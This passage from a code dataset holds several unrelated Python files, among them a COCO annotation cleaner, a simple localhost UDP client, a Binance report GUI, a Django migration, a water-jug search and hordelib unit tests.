feature_map[filename] = feature\n\ntrain_df = pd.read_csv(\"train/groundtruth.csv\")\nwarmup_train_df = pd.read_csv(\"warmup_train/groundtruth.csv\")\nwarmup_train_df = warmup_train_df.drop(warmup_train_df.columns[0], axis=1)\nprint(warmup_train_df.head())\ndf = pd.concat([train_df, warmup_train_df])\nprint(df.head())\ncoco_data = {\"info\": {}, \"licenses\": [], \"categories\": [], \"images\": [], \"annotations\": []}\ncategories = []\nfor index, row in df.iterrows():\n    class_id = row[\"class_id\"]\n    if class_id == 15:\n        continue\n    if class_id > 15:\n        class_id = class_id - 1\n    if class_id > 11:\n        class_id = class_id - 1\n    class_name = row[\"class_name\"]\n\n    if class_name not in categories:\n        categories.append(class_name)\n        coco_data[\"categories\"].append({\"id\": class_id, \"name\": class_name})\n\nimage_ids = {}\nbbox_dup_check = {}\nfeature_dup_check = set()\nindex = 0\nc_dup_bbox = 0\nc_dup_feature = 0\nc_remove = 0\nlarge_class = {0: \"assam macaque\", 3: \"chinese serow\", 4: \"roosevelt's muntjac\", 6: \"wild boar\", 10: \"giant muntjac\",\n               19: \"grey peacock-pheasant\", 22: \"stump-tailed macaque\", 23: \"red-shanked douc\", 24: \"pig-tailed macaque\",\n               25: \"sambar\", 28: \"red muntjac\"\n}\nclean_filenames = []\nclean_feature_list = []\nfor _, row in tqdm(df.iterrows()):\n    image_id = row[\"image_id\"]\n\n    class_id = row[\"class_id\"]\n    if class_id == 15:\n        continue\n    x_min,y_min,x_max,y_max = row[\"x_min\"], row[\"y_min\"], row[\"x_max\"], row[\"y_max\"]\n    if (class_id, x_min,y_min,x_max,y_max) in bbox_dup_check.keys():\n        # print(\"Duplicate bbox: \", image_id, bbox_dup_check[(class_id, x_min,y_min,x_max,y_max)])\n        c_dup_bbox += 1\n        continue\n    else:\n        bbox_dup_check[(class_id, x_min,y_min,x_max,y_max)] = image_id\n    \n    if x_max - x_min <= 10:\n        continue\n\n    if y_max - y_min <= 10:\n        continue\n\n    if (x_max - x_min <= 20 or y_max - y_min <= 20) and class_id in 
large_class.keys():\n c_remove += 1\n continue\n filename = os.path.join(\"train/images\", str(image_id) + \".jpg\")\n feature = feature_map[filename]\n flag = False\n for old_feature, old_imageid in zip(clean_feature_list, clean_filenames):\n if image_id != old_imageid:\n if(image_id, old_imageid) not in feature_dup_check:\n if distance.cosine(feature, old_feature) <= 0.05:\n # print(\"Duplicate feature: \", image_id, old_imageid)\n c_dup_feature += 1\n feature_dup_check.add((image_id, old_imageid))\n feature_dup_check.add((old_imageid, image_id))\n flag = True\n break\n if flag == True:\n continue\n clean_filenames.append(image_id)\n clean_feature_list.append(feature_map[filename])\n if class_id > 15:\n class_id = class_id - 1\n if class_id > 11:\n class_id = class_id - 1\n class_name = row[\"class_name\"]\n\n if image_id not in image_ids.keys():\n image = cv2.imread(os.path.join(\"train/images\", image_id + \".jpg\"))\n h, w, _ = image.shape\n image_ids[image_id] = (h, w)\n else:\n h, w = image_ids[image_id]\n\n image_info = {\"id\": image_id, \"file_name\": image_id + \".jpg\", \"height\": h, \"width\": w}\n \n coco_data[\"images\"].append(image_info)\n annotation_info = {\n \"id\": index,\n \"image_id\": image_id,\n \"category_id\": class_id,\n \"bbox\": [int(x_min), int(y_min), int(x_max - x_min), int(y_max - y_min)],\n \"bbox_mode\": 1,\n \"iscrowd\": 0,\n \"area\": int(x_max - x_min)*int(y_max - y_min),\n }\n coco_data[\"annotations\"].append(annotation_info)\n index += 1\nprint(\"Total dup bbox: \", c_dup_bbox)\nprint(\"Total remove: \", c_remove)\nprint(\"Total dup feature: \", c_dup_feature)\nprint(\"Total image: \", len(coco_data[\"images\"]))\noutput_file_path = \"train_clean.json\"\nwith open(output_file_path, \"w\", encoding=\"utf-8\") as output_file:\n json.dump(coco_data, output_file, ensure_ascii=True, indent=4)","repo_name":"quanvuhust/vietteliot","sub_path":"process_data/create_coco_anno_clean.py","file_name":"create_coco_anno_clean.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72364247912","text":"import socket\n# From Black Hat Python: Python Programming for Hackers and Pentesters 1st Edition by Justin Seitz\n\ntarget_host = \"127.0.0.1\"\ntarget_port = 80\npayload = \"AAABBBCCC\"\n\n# create a socket object\nclient = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n# send some data\nclient.sendto(payload.encode(),(target_host,target_port))\n\n# receive some data\ndata, addr = client.recvfrom(4096)\n\nprint(data)","repo_name":"dustinbutterworth/udpClient","sub_path":"udpClient.py","file_name":"udpClient.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72178805033","text":"################### Program Info ###################\nVERSION = \"1.3\"\nRELEASE = \"2023/11/28 19:20\"\nINFO_GUI = f\"\"\"\nVERSION\n{VERSION}\n\nRELEASE\n{RELEASE}\n\nAUTHOR\nNorbert Lipowicz\n\"\"\"\nMAIN_WINDOW = \"Binance Report Generator v\" + VERSION\n####################################################\n\n\nimport os\nimport sys\nimport json\nimport traceback\nfrom datetime import datetime\n\nimport pandas as pd\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QFileDialog, QMessageBox, QDateEdit\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtCore import *\nimport icon\n\nfrom exceptions import *\nfrom const import *\nfrom nbp_api import NBPAPI\nfrom 
excel_writer import ExcelWriter\nfrom gui import Ui_MainWindow\nfrom binance_report import BinanceReport, get_api_keys\n\n\ndef show_msgbox(message: str, msg_type: str, **kwargs):\n    \"\"\"Types: Information, Warning, Error\"\"\"\n    msg = QMessageBox()\n    icon = QIcon(\":Logo.png\")\n    msg.setWindowIcon(icon)\n    # msg.setWindowIcon(get_icon())\n    if msg_type == \"Information\":\n        msg.setIcon(QMessageBox.Information)\n\n        if \"option_open\" in kwargs.keys():\n            msg.setStandardButtons(QMessageBox.Ok | QMessageBox.Open)\n            msg.button(QMessageBox.Open).setText(kwargs[\"option_open\"])\n\n    elif msg_type == \"Warning\":\n        msg.setIcon(QMessageBox.Warning)\n        msg.setStandardButtons(QMessageBox.Yes | QMessageBox.No)\n\n    elif msg_type == \"Error\":\n        msg.setIcon(QMessageBox.Critical)\n\n    msg.setWindowTitle(msg_type)\n    msg.setText(message)\n    return msg.exec_()\n\n\ndef browse_save_file(current, caption, filter):\n    path = QFileDialog.getSaveFileName(\n        caption=caption,\n        filter=filter\n    )[0]\n    return path if path != \"\" else current\n\n\ndef browse_open_file(current, caption, filter):\n    path = QFileDialog.getOpenFileName(\n        caption = caption, \n        filter = filter\n    )[0]\n    return path if path != \"\" else current\n\n\ndef get_date_as_datetime(date_attr: QDateEdit):\n    date = date_attr.text().split('.')\n    date = [int(el) for el in date]\n    return datetime(year=date[2], month=date[1], day=date[0])\n\n\nclass ThreadSignals(QObject):\n    set_gui_state = pyqtSignal(bool)\n    finished = pyqtSignal(str)\n    error = pyqtSignal(Exception)\n    progress = pyqtSignal(str)\n\n\nclass Thread(QThread):\n    def __init__(self, fn, *args, **kwargs):\n        super(Thread, self).__init__()\n\n        # Store constructor arguments (re-used for processing)\n        self.fn = fn\n        self.args = args\n        self.kwargs = kwargs\n        self.signals = ThreadSignals()\n\n        # Add the callback to our kwargs\n        self.kwargs['progress_callback'] = self.signals.progress\n\n    @pyqtSlot()\n    def run(self):\n        # Retrieve args/kwargs here; and fire processing using them\n        try:\n            self.signals.set_gui_state.emit(False)\n            res = self.fn(*self.args, **self.kwargs)\n            self.signals.finished.emit(res)\n\n        except Exception as e:\n            self.signals.error.emit(e)\n\n        finally:\n            self.signals.set_gui_state.emit(True)\n\n\nclass BRMainWindow(Ui_MainWindow):\n    def __init__(self):\n        # class variables definition\n        self.path_api_keys = ''\n        self.path_report = ''\n        self.binance_symbols = []\n        self.thread: Thread = '' # placeholder\n\n        self.MainWindow = QtWidgets.QMainWindow()\n        self.setupUi(self.MainWindow)\n        self.MainWindow.setWindowTitle(MAIN_WINDOW)\n\n        icon = QIcon(':Logo.png')\n        self.MainWindow.setWindowIcon(icon)\n\n        self.GUI_MenuBar_ProgramInfo.triggered.connect(self.show_program_info)\n        self.GUI_Button_KluczeAPI.clicked.connect(self.browse_path_api_keys)\n        self.Gui_Button_LokalizacjaRaportu.clicked.connect(self.browse_path_report)\n        self.GUI_MenuBar_Generuj.triggered.connect(self.generate_template_api_keys)\n        self.GUI_Button_GenerujRaport.clicked.connect(self.run_program)\n        self.GUI_CheckBox_Krypto.clicked.connect(self.set_crypto_choice_state)\n        self.GUI_GroupBox_WyborKrypto.clicked.connect(self.set_crypto_choice_internal_state)\n        self.GUI_LineEdit_Symbol.textChanged.connect(self.update_binance_symbols_list)\n        self.GUI_List_Symbol.itemDoubleClicked.connect(self.add_chosen_symbol)\n        self.GUI_List_SymbolChosen.itemDoubleClicked.connect(self.remove_chosen_symbol)\n\n        app.aboutToQuit.connect(self.end_program)\n\n        # set initial state\n        self.GUI_GroupBox_Wybor.setEnabled(False)\n        
self.GUI_GroupBox_Daty.setEnabled(False)\n self.GUI_GroupBox_Raport.setEnabled(False)\n\n binance_report = BinanceReport()\n self.binance_symbols = binance_report.get_symbols()\n self.GUI_Label_SymbolList.setText(f\"Dostępne symbole ({len(self.binance_symbols)})\")\n self.GUI_List_Symbol.clear()\n self.GUI_List_Symbol.addItems(self.binance_symbols)\n\n\n def show_program_info(self):\n show_msgbox(INFO_GUI, \"Information\")\n \n\n def browse_path_api_keys(self):\n self.path_api_keys = browse_open_file(\n current = self.path_api_keys,\n caption = \"Wyszukaj plik kluczy API\",\n filter = \"Pliki JSON (*.json)\"\n )\n self.GUI_LineEdit_KluczeAPI.setText(self.path_api_keys)\n\n if self.path_api_keys != '':\n self.GUI_GroupBox_Wybor.setEnabled(True)\n self.GUI_GroupBox_Daty.setEnabled(True)\n self.GUI_GroupBox_Raport.setEnabled(True)\n\n\n def browse_path_report(self):\n self.path_report = browse_save_file(\n current = self.path_report,\n caption = \"Wyszukaj lokalizację raportu\",\n filter = \"Pliki Excel (*.xlsx)\"\n )\n self.GUI_LineEdit_LokalizacjaRaportu.setText(self.path_report)\n \n\n def set_crypto_choice_state(self):\n krypto_checkbox_state = self.GUI_CheckBox_Krypto.isChecked()\n self.GUI_GroupBox_WyborKrypto.setEnabled(krypto_checkbox_state)\n\n \n def set_crypto_choice_internal_state(self):\n krypto_choice_groupbox_state = self.GUI_GroupBox_WyborKrypto.isChecked()\n self.GUI_Label_Symbol.setEnabled(krypto_choice_groupbox_state)\n self.GUI_Label_SymbolList.setEnabled(krypto_choice_groupbox_state)\n self.GUI_Label_SymbolChosen.setEnabled(krypto_choice_groupbox_state)\n self.GUI_LineEdit_Symbol.setEnabled(krypto_choice_groupbox_state)\n self.GUI_List_Symbol.setEnabled(krypto_choice_groupbox_state)\n self.GUI_List_SymbolChosen.setEnabled(krypto_choice_groupbox_state)\n\n\n def update_binance_symbols_list(self):\n curr_text = self.GUI_LineEdit_Symbol.text().upper()\n symbols = [symbol for symbol in self.binance_symbols if curr_text in symbol]\n self.GUI_List_Symbol.clear()\n self.GUI_List_Symbol.addItems(symbols)\n\n\n def add_chosen_symbol(self):\n symbol = self.GUI_List_Symbol.currentItem()\n self.GUI_List_SymbolChosen.addItem(symbol.text())\n\n\n def remove_chosen_symbol(self):\n symbol = self.GUI_List_SymbolChosen.currentItem()\n row = self.GUI_List_SymbolChosen.row(symbol)\n self.GUI_List_SymbolChosen.takeItem(row)\n\n\n def get_chosen_symbols(self) -> list:\n symbols = self.GUI_List_SymbolChosen.findItems(\"*\", Qt.MatchFlag.MatchWildcard)\n return [symbol.text() for symbol in symbols]\n\n \n def generate_template_api_keys(self):\n path = ''\n path = browse_save_file(\n current = path,\n caption = \"Wyszukaj lokalizację dla szablonu pliku kluczy API\",\n filter = \"Pliki JSON (*.json)\"\n )\n if path != '':\n with open(path, 'w') as f:\n f.write(\"\"\"{\\n\\t\"api_key\": \"tutaj_wklej_klucz_publiczny\",\\n\\t\"secret_key\": \"tutaj_wklej_klucz_prywatny\"\\n}\"\"\")\n result = show_msgbox(\"Zapisano szablon pliku kluczy API\", \"Information\", option_open = \"Otwórz plik\")\n if result == QMessageBox.Open:\n os.startfile(path)\n\n\n def generate_report(self, progress_callback = None):\n start_date = get_date_as_datetime(self.GUI_Date_Start)\n end_date = get_date_as_datetime(self.GUI_Date_End)\n\n if self.path_api_keys == '':\n raise PathError(\"Podaj lokalizację pliku kluczy API\")\n \n try:\n api_key, secret_key = get_api_keys(self.path_api_keys)\n except json.decoder.JSONDecodeError as e:\n raise APIKeysError(f\"Wykryto błąd w składni pliku JSON z kluczami API\\n{e}\")\n \n if 
end_date <= start_date:\n raise DateError(\"Błędny zakres dat\")\n\n if self.path_report == '':\n raise PathError(\"Podaj lokalizację do zapisu raportu\")\n \n chosen_symbols = None\n if self.GUI_GroupBox_WyborKrypto.isChecked() and self.GUI_GroupBox_WyborKrypto.isEnabled():\n chosen_symbols = self.get_chosen_symbols()\n if len(chosen_symbols) == 0:\n raise SymbolsError(\"Wybierz symbole lub odznacz 'Wybór krypto'\")\n \n binance_report = BinanceReport(api_key=api_key, secret_key=secret_key, progress_callback=progress_callback)\n\n output_df_dict = {}\n list_of_empty = []\n list_of_checked = []\n\n if self.GUI_CheckBox_Krypto.isChecked():\n list_of_checked.append(\"Krypto\")\n output_df_dict[\"Krypto\"] = binance_report.get_crypto_transactions(start_date, end_date, chosen_symbols)\n if len(output_df_dict[\"Krypto\"]) == 0:\n list_of_empty.append(\"Krypto\")\n \n if self.GUI_CheckBox_TransakcjeMiedzyPlatformami.isChecked():\n list_of_checked.append(\"Transakcje_miedzy_plaftormami\")\n output_df_dict[\"Transakcje_miedzy_plaftormami\"] = binance_report.get_between_platforms_transactions(start_date, end_date)\n if len(output_df_dict['Transakcje_miedzy_plaftormami']) == 0:\n list_of_empty.append(\"Transakcje_miedzy_plaftormami\")\n \n if self.GUI_CheckBox_P2P.isChecked():\n list_of_checked.append(\"P2P\")\n output_df_dict[\"P2P\"] = binance_report.get_p2p_transactions(start_date, end_date)\n if len(output_df_dict[\"P2P\"]) == 0:\n list_of_empty.append(\"P2P\")\n \n if self.GUI_CheckBox_FIATKrypto.isChecked():\n list_of_checked.append(\"FIAT_Krypto\")\n output_df_dict[\"FIAT_Krypto\"] = binance_report.get_fiat_crypto_transactions(start_date, end_date)\n if len(output_df_dict[\"FIAT_Krypto\"]) == 0:\n list_of_empty.append(\"FIAT_Krypto\")\n \n if self.GUI_CheckBox_FIAT.isChecked():\n list_of_checked.append(\"FIAT\")\n output_df_dict[\"FIAT\"] = binance_report.get_fiat_transactions(start_date, end_date)\n if len(output_df_dict[\"FIAT\"]) == 0:\n list_of_empty.append(\"FIAT\")\n \n if self.GUI_CheckBox_RaportPodatkowy.isChecked():\n list_of_checked.append(\"Raport_podatkowy\")\n\n p2p_df = binance_report.get_p2p_transactions(start_date, end_date) if not \"P2P\" in output_df_dict.keys() else output_df_dict[\"P2P\"]\n fiat_krypto_df = binance_report.get_fiat_crypto_transactions(start_date, end_date) if not \"FIAT_Krypto\" in output_df_dict.keys() else output_df_dict[\"FIAT_Krypto\"]\n fiat_df = binance_report.get_fiat_transactions(start_date, end_date) if not \"FIAT\" in output_df_dict.keys() else output_df_dict[\"FIAT\"]\n\n fiat_krypto_df = fiat_krypto_df[fiat_krypto_df[\"Rodzaj handlu\"] == \"Wpłata\"]\n\n columns = [\"Data utworzenia\", \"Ilość FIAT\", \"Prowizja\", \"FIAT\", \"Rodzaj handlu\"]\n to_concat = [el[columns] for el in [p2p_df, fiat_krypto_df, fiat_df] if len(el) > 0]\n raport_podatkowy_df = pd.concat(to_concat) if len(p2p_df) > 0 or len(fiat_krypto_df) > 0 or len(fiat_df) > 0 else pd.DataFrame()\n\n if len(raport_podatkowy_df) > 0:\n raport_podatkowy_df.sort_values(by=\"Data utworzenia\", inplace=True)\n raport_podatkowy_df['Ilość FIAT'] = raport_podatkowy_df.apply(lambda x: x['Ilość FIAT'] if x['Rodzaj handlu'] == 'Wpłata' else -1 * x['Ilość FIAT'], axis=1)\n raport_podatkowy_df['Kurs do PLN'] = raport_podatkowy_df.apply(lambda x: 1 if x['FIAT'] == 'PLN' else NBPAPI().get_mid_price(x['FIAT'], x['Data utworzenia']), axis=1)\n raport_podatkowy_df['Wartość końcowa PLN'] = (raport_podatkowy_df['Ilość FIAT'] * raport_podatkowy_df['Kurs do PLN']).round(2)\n 
raport_podatkowy_df['Koszt(+)/Dochód(-)'] = raport_podatkowy_df['Wartość końcowa PLN'].cumsum().round(2)\n else:\n list_of_empty.append(\"Raport_podatkowy\")\n \n output_df_dict[\"Raport_podatkowy\"] = raport_podatkowy_df\n \n if len(output_df_dict) == 0:\n raise CheckBoxError(\"Nie wybrano żadnej opcji\")\n \n end_msg = ''\n if len(list_of_empty) > 0:\n if len(list_of_empty) == len(output_df_dict.keys()):\n end_msg = Messages.TRANSACTIONS_NOT_FOUND % ', '.join(list_of_empty) + '\\n' + Messages.REPORT_NOT_GENERATED\n else:\n end_msg = Messages.TRANSACTIONS_NOT_FOUND % ', '.join(list_of_empty) + '\\n' + Messages.REPORT_GENERATED\n \n updated_output_df_dict = {}\n for key in output_df_dict.keys():\n if key not in list_of_empty and key in list_of_checked:\n updated_output_df_dict[key] = output_df_dict[key]\n\n if len(updated_output_df_dict) > 0:\n xlsx_writer = ExcelWriter(self.path_report)\n try:\n xlsx_writer.save_dataframes_to_excel(updated_output_df_dict)\n except PermissionError:\n raise FileAccessError(f\"Zapis do pliku '{self.path_report}' jest niemożliwy. Zamknij plik i spróbuj ponownie\")\n \n if end_msg == '':\n return Messages.REPORT_GENERATED\n else:\n return end_msg\n\n\n # Functions for multithreading\n def program_set_gui_state(self, state: bool):\n self.menuPlik.setEnabled(state)\n self.GUI_GroupBox_API.setEnabled(state)\n self.GUI_GroupBox_Wybor.setEnabled(state)\n self.GUI_GroupBox_Daty.setEnabled(state)\n self.GUI_GroupBox_Raport.setEnabled(state)\n self.GUI_Button_GenerujRaport.setEnabled(state)\n\n\n def program_finished(self, res: str | None):\n self.GUI_Label_Progress.setText('')\n\n if Messages.REPORT_GENERATED in res:\n result = show_msgbox(res, \"Information\", option_open = \"Otwórz plik\")\n if result == QMessageBox.Open:\n os.startfile(self.path_report)\n else:\n result = show_msgbox(res, \"Information\")\n \n\n def program_error(self, e):\n self.GUI_Label_Progress.setText('')\n if issubclass(type(e), BinanceReportException):\n show_msgbox(f\"Rodzaj błędu:\\n{type(e).__name__}\\n\\nOpis błędu:\\n{e}\", msg_type=\"Error\")\n else:\n err_desc = traceback.format_exception(e)\n show_msgbox(f\"Wystąpił nieobsługiwany błąd. 
Skontaktuj się z autorem.\\n\\nOpis błędu:\\n{''.join(err_desc)}", msg_type=\"Error\")\n\n\n    def program_update_progress(self, text):\n        self.GUI_Label_Progress.setText(text)\n    \n\n    def run_program(self):\n        self.thread = Thread(self.generate_report)\n        self.thread.signals.set_gui_state.connect(self.program_set_gui_state)\n        self.thread.signals.progress.connect(self.program_update_progress)\n        self.thread.signals.error.connect(self.program_error)\n        self.thread.signals.finished.connect(self.program_finished)\n        self.thread.start()\n    \n\n    def end_program(self):\n        if isinstance(self.thread, Thread):\n            self.thread.exit()\n\n\nif __name__ == '__main__':\n    app = QtWidgets.QApplication(sys.argv)\n    ui = BRMainWindow()\n    ui.MainWindow.show()\n    sys.exit(app.exec_())","repo_name":"Lipovitsch/binance_report","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24906456448","text":"from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n    dependencies = [\n        ("animal", "0012_endpoint_effect_subtype"),\n    ]\n\n    operations = [\n        migrations.AlterField(\n            model_name="endpoint",\n            name="observation_time_units",\n            field=models.PositiveSmallIntegerField(\n                default=0,\n                choices=[\n                    (0, b"not-reported"),\n                    (1, b"seconds"),\n                    (2, b"minutes"),\n                    (3, b"hours"),\n                    (4, b"days"),\n                    (5, b"weeks"),\n                    (6, b"months"),\n                    (9, b"years"),\n                    (7, b"PND"),\n                    (8, b"GD"),\n                ],\n            ),\n        ),\n    ]\n","repo_name":"shapiromatron/hawc","sub_path":"hawc/apps/animal/migrations/0013_auto_20150924_1045.py","file_name":"0013_auto_20150924_1045.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"4213168587","text":"from collections import deque\n\nclass Pair:\n    def __init__(self, j1, j2, path=[]):\n        self.j1 = j1\n        self.j2 = j2\n        self.path = path + [(j1, j2)]\n\ndef getPathIfPossible(jug1, jug2, target):\n    visited = [[False] * (jug2 + 1) for _ in range(jug1 + 1)]\n    queue = deque()\n\n    # Initial State: Both Jugs are empty so,\n    # initialise j1 j2 as 0 and put it in the path list\n    initialState = Pair(0, 0)\n    queue.append(initialState)\n\n    while queue:\n        curr = queue.popleft()\n\n        # Skip already visited states and overflowing water states\n        if curr.j1 > jug1 or curr.j2 > jug2 or visited[curr.j1][curr.j2]:\n            continue\n        # mark current jugs state as visited\n        visited[curr.j1][curr.j2] = True\n\n        # Check if current state has already reached the target amount of water or not\n        if curr.j1 == target or curr.j2 == target:\n            if curr.j1 == target:\n                # If in our current state, jug1 holds the required amount of water, then we\n                # empty the jug2 and push it into our path.\n                curr.path.append((curr.j1, 0))\n            else:\n                # else, If in our current state, jug2 holds the required amount of water,\n                # then we empty the jug1 and push it into our path.\n                curr.path.append((0, curr.j2))\n\n            print("Path of states of jugs followed is :")\n            for state in curr.path:\n                print(f"{state[0]}, {state[1]}")\n            return\n\n        # If we have not yet found the target, then we have four cases left\n        # I. Fill the jug and Empty the other\n        # II. Fill the jug and let the other remain untouched\n        # III. Empty the jug and let the other remain untouched\n        # IV. 
Transfer amounts from one jug to another\n\n        # Please refer to the table attached above to understand the cases that we are taking into consideration\n\n        # Now,\n        # I. Fill the jug and Empty the other\n        queue.append(Pair(jug1, 0, curr.path))\n        queue.append(Pair(0, jug2, curr.path))\n\n        # II. Fill the jug and let the other remain untouched\n        queue.append(Pair(jug1, curr.j2, curr.path))\n        queue.append(Pair(curr.j1, jug2, curr.path))\n\n        # III. Empty the jug and let the other remain untouched\n        queue.append(Pair(0, curr.j2, curr.path))\n        queue.append(Pair(curr.j1, 0, curr.path))\n\n        # IV. Transfer water from one to another until one jug becomes empty or until one jug\n        # becomes full in this process\n\n        # Transferring water from jug1 to jug2\n        emptyJug = jug2 - curr.j2\n        amountTransferred = min(curr.j1, emptyJug)\n        j2 = curr.j2 + amountTransferred\n        j1 = curr.j1 - amountTransferred\n        queue.append(Pair(j1, j2, curr.path))\n\n        # Transferring water from jug2 to jug1\n        emptyJug = jug1 - curr.j1\n        amountTransferred = min(curr.j2, emptyJug)\n        j1 = curr.j1 + amountTransferred\n        j2 = curr.j2 - amountTransferred\n        queue.append(Pair(j1, j2, curr.path))\n\n    # queue exhausted without ever reaching the target amount\n    print("No sequence of moves reaches the target")\n\nif __name__ == '__main__':\n    \n    Jug1, Jug2, target = 5 , 3 , 4\n    print("Path from initial state "\n          "to solution state ::")\n    \n    getPathIfPossible(Jug1, Jug2, target)\n","repo_name":"yadav-Simran/AI-Algorithms","sub_path":"waterjug.py","file_name":"waterjug.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19742291196","text":"# test_setup.py\nimport glob\n\nimport pytest\n\nfrom hordelib.comfy_horde import Comfy_Horde\n\n\nclass TestSetup:\n    NUMBER_OF_PIPELINES = len(glob.glob("hordelib/pipelines/*.json"))\n    comfy: Comfy_Horde\n\n    @pytest.fixture(autouse=True)\n    def setup_and_teardown(self):\n        self.comfy = Comfy_Horde()\n        yield\n        del self.comfy\n\n    def test_load_pipelines(self):\n        loaded = self.comfy._load_pipelines()\n        assert loaded == TestSetup.NUMBER_OF_PIPELINES\n        # Check the built in pipelines\n        assert "stable_diffusion" in self.comfy.pipelines\n        assert "stable_diffusion_hires_fix" in self.comfy.pipelines\n        assert "image_upscale" in self.comfy.pipelines\n        assert "stable_diffusion_paint" in self.comfy.pipelines\n        assert "controlnet" in self.comfy.pipelines\n\n    def test_load_invalid_pipeline(self):\n        loaded = self.comfy._load_pipeline("no-such-pipeline")\n        assert loaded is None\n\n    def test_load_custom_nodes(self):\n        self.comfy._load_custom_nodes()\n\n        # Look for our nodes in the ComfyUI nodes list\n        import execution\n\n        assert "HordeCheckpointLoader" in execution.nodes.NODE_CLASS_MAPPINGS\n        assert "HordeImageOutput" in execution.nodes.NODE_CLASS_MAPPINGS\n        assert "HordeImageLoader" in execution.nodes.NODE_CLASS_MAPPINGS\n\n    def test_parameter_injection(self):\n        test_dict = {\n            "a": {\n                "inputs": {"b": False},\n            },\n            "c": {"inputs": {"d": {"e": False, "f": False}}},\n        }\n\n        params = {\n            "a.b": True,\n            "c.d.e": True,\n            "c.inputs.d.f": True,\n            "unknown.parameter": False,\n        }\n        self.comfy._set(test_dict, **params)\n        assert test_dict["a"]["inputs"]["b"]\n        assert test_dict["c"]["inputs"]["d"]["e"]\n        assert test_dict["c"]["inputs"]["d"]["f"]\n        assert "unknown.parameter" not in test_dict\n\n    def test_fix_pipeline_types(self):\n        data = {\n            "node1": {"class_type": "ShouldNotBeReplaced"},\n            "node2": {"no_class": "NoClassType"},\n            "node3-should-be-replaced": {"class_type": "CheckpointLoaderSimple"},\n        }\n        data = self.comfy._fix_pipeline_types(data)\n\n        assert data["node1"]["class_type"] == 
\"ShouldNotBeReplaced\"\n assert data[\"node2\"][\"no_class\"] == \"NoClassType\"\n assert data[\"node3-should-be-replaced\"][\"class_type\"] == \"HordeCheckpointLoader\"\n\n def test_fix_node_names(self):\n # basically we are expecting a search and replace of \"1\" with the \"title\" of id 1, etc.\n data = {\n \"1\": {\n \"inputs\": {\n \"input1\": [\"2\", 0],\n \"input2\": [\"3\", 0],\n \"input3\": \"foo\",\n \"input4\": 33,\n \"input5\": None,\n },\n },\n \"2\": {\n \"inputs\": {\n \"input1\": [\"3\", 0],\n \"input2\": [\"1\", 0],\n \"input3\": \"foo\",\n \"input4\": 33,\n \"input5\": None,\n },\n },\n \"3\": {\n \"inputs\": {\n \"input1\": [\"2\", 0],\n \"input2\": [\"1\", 0],\n \"input3\": \"foo\",\n \"input4\": 33,\n \"input5\": None,\n },\n },\n }\n design = {\n \"nodes\": [\n {\"id\": 1, \"title\": \"Node1\"},\n {\"id\": 2, \"title\": \"Node2\"},\n {\"id\": 3, \"no_title\": \"Node3\"},\n ],\n }\n data = self.comfy._fix_node_names(data, design)\n\n assert \"Node1\" in data\n assert data[\"Node1\"][\"inputs\"][\"input1\"][0] == \"Node2\"\n assert data[\"Node1\"][\"inputs\"][\"input2\"][0] == \"3\"\n assert \"Node2\" in data\n assert data[\"Node2\"][\"inputs\"][\"input1\"][0] == \"3\"\n assert data[\"Node2\"][\"inputs\"][\"input2\"][0] == \"Node1\"\n assert \"3\" in data\n assert data[\"3\"][\"inputs\"][\"input1\"][0] == \"Node2\"\n assert data[\"3\"][\"inputs\"][\"input2\"][0] == \"Node1\"\n\n def test_input_reconnection(self):\n # Can we reconnect the latent_image input of the sampler from the\n # empty_latent_image to the vae_encoder? And in the process\n # disconnect any existing connection that is already there?\n data = {\n \"sampler\": {\n \"inputs\": {\n \"seed\": 760767020359210,\n \"steps\": 20,\n \"cfg\": 8.0,\n \"sampler_name\": \"euler\",\n \"scheduler\": \"normal\",\n \"denoise\": 1.0,\n \"model\": [\"model_loader\", 0],\n \"positive\": [\"prompt\", 0],\n \"negative\": [\"negative_prompt\", 0],\n \"latent_image\": [\"empty_latent_image\", 0],\n },\n \"class_type\": \"KSampler\",\n },\n \"vae_encoder\": {\n \"inputs\": {\"pixels\": [\"image_loader\", 0], \"vae\": [\"model_loader\", 2]},\n \"class_type\": \"VAEEncode\",\n },\n \"empty_latent_image\": {\n \"inputs\": {\"width\": 512, \"height\": 512, \"batch_size\": 1},\n \"class_type\": \"EmptyLatentImage\",\n },\n }\n result = self.comfy.reconnect_input(data, \"sampler.latent_image\", \"vae_encoder\")\n # Should be ok\n assert result\n assert data[\"sampler\"][\"inputs\"][\"latent_image\"][0] == \"vae_encoder\"\n # This is invalid\n result = self.comfy.reconnect_input(data, \"sampler.non-existant\", \"somewhere\")\n assert not result\n","repo_name":"Haidra-Org/hordelib_old","sub_path":"tests/test_comfy.py","file_name":"test_comfy.py","file_ext":"py","file_size_in_byte":5701,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"8032247758","text":"from django.contrib import admin\n\nfrom Betty.apps.bets.models import Bet, Event\n\n\n@admin.register(Event)\nclass EventAdmin(admin.ModelAdmin):\n list_display = ['title', 'home', 'away', 'date', 'sport_name', 'league', 'match_result']\n list_filter = ['sport_name', 'date', 'match_result']\n list_editable = ['match_result']\n\n\n@admin.register(Bet)\nclass BetAdmin(admin.ModelAdmin):\n list_display = ['event', 'selection', 'side', 'stake', 'odds', 'matched', 'has_won']\n list_filter = ['matched', 'has_won']\n list_editable = 
